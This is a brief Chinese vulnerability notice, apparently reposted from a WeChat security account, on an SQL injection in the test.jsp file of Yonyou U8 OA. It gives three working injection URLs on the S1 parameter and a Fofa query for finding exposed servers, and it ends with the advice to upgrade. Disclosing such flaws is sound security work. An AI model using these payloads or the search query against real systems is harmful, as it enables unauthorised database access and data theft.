影响范围
用友U8 OA
漏洞类型
SQL注入
利用条件
影响范围
漏洞概述
用友U8 OA test.jsp文件存在SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞
漏洞复现
登录页面如下
http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(user()))
或者直接查询user也可以:
http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20user())
漏洞检索
Fofa:
app="用友U8+OA基础版"
安全建议
升级到最新版本~
原文始发于微信公众号(七芒星实验室):用友U8 OA test.jsp SQL注入
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论